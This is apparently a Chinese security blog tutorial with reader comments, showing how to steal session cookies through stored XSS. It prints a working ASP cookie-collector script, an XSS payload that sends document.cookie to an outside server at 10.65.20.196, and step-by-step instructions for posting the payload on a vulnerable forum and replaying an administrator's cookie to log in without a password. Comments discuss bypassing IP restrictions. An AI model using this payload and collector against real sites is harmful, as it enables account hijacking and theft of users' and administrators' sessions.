获取cookie利用代码cookie.asp
<html> <title>xx</title> <body> <%testfile = Server.MapPath("code.txt") //先构造一个路径,也就是取网站根目录,创造一个在根目录下的code.txt路径,保存在testfile中 msg = Request("msg") //获取提交过来的msg变量,也就是cookie值 set fs = server.CreateObject("scripting.filesystemobject")//创建一个fs对象 set thisfile = fs.OpenTextFile(testfile,8,True,0) thisfile.WriteLine(""&msg&"")//像code.txt中写入获取来的cookie thisfile.close() //关闭 set fs = nothing%> </body> </html>
把上述文件保存为cookie.asp文件,放到你自己的网站服务器下。比如这里我们自己搭建的服务器为:http://10.65.20.196:8080。
XSS构造语句
<script>window.open('http://10.65.20.196:8080/cookie.asp?msg='+document.cookie)</script>
把上述语句放到你找到的存在XSS的目标中,不过这里最好是存储型xss,比如你找到了某个博客或者论坛什么的存在存储型XSS,你在里面发一篇帖子或者留上你的评论,内容就是上述语句,当其他用户或者管理员打开这个评论或者帖子链接后,就会触发,然后跳转到http://10.65.20.196:8080/cookie.asp?msg=’+document.cookie的页面,然后当前账户的coolie信息就当成参数发到你的网站下的文件里了。然后的然后你就可以那这个cookie登陆了。。。。。。
简单步骤如下:
1、在存在漏洞的论坛中发日志:
2、然后以管理远登陆,进入后页面会跳转,此时cookie就发送到你的服务器下的code.txt文件中了:
3、这是没有账户前的登陆界面:
4、打开firefox的Tamper Data插件,点击Start Tamper开始抓取信息,刷新登陆界面,然后会跳出对话框,点击Tamper按钮,在途中的cookie一栏中替换掉你抓取到的cookie,单击确定发送请求数据:
5、替换cookie后不用输用户名密码就顺利进入管理员账户了:
[ by xfk ]
11月 上海
CIS 2019首席信息安全官闭门高峰论坛11月
CIS 2019议题抢先看10月
公开课双十一活动9月 上海
CIS 2019官网上线,早鸟票同步开售
已有 23 条评论
对学习基础很有啊,像我这么菜的人还是很喜欢这种类型文章的。感谢分享。
@litdg 呵呵,先学走在学跑嘛,一步一步来,慢慢捉摸捣腾。
<a href="http://wwww.baidu.com">点击去抽奖</a>
万分感谢
感谢
实战性不大
@kbc0ld 那你看看这个方法实战性咋样?http://blog.sina.com.cn/s/blog_714c124f01016hge.html
@xfk 我是说你写的这个xss payload,只能用作演示用的东西,想要正真用在渗透(精准xx00)中,考虑的东西要比这个多得多
@xfk 突然发现博主转载的文章的博客是我的
@kbc0ld 嗯,实际考虑的东西多着咧,而且成功率较低!
@xfk 成功率低这个到不一定,没有过滤的话,一打一个准,但遇到管理后台有ip限制的,怎样突破限制可以研究下。怎样通过一个xss抓取到页面的关键信息等都可以研究下。
1 博客里的文章要使用ARP欺骗,但很多电脑多有[数字]软件,所以成功概率很低。
2 既然是工作环境的IP,一定要打马赛克,不然你会有犯大错的时候。
3 ??76同学,要低调,才能踏实工作。
@zero 嗯,是的,忘了,谢谢提醒!万分感谢
??76 座机号?
各种人肉,悲剧的年代啊
@bypass 看起来貌似是 @zero 貌似是@xfk同事 or上司,纯属猜测,哈哈
@kbc0ld 难道是上司……被领导看见了啊
我晕啊 小冰 啊 求 关注 求交友 求 xss 玩
好多网站拿到cookie也没用,文章这种能成功利用适用于怎样的验证机制呢??
要是依靠session验证的话怎么破?
学习了
终于知道XSS平台怎么用了,喜欢这种简单实用的文章,看完能操作
cookie 插入后302 重定向了怎么办?
code.txt保存在哪儿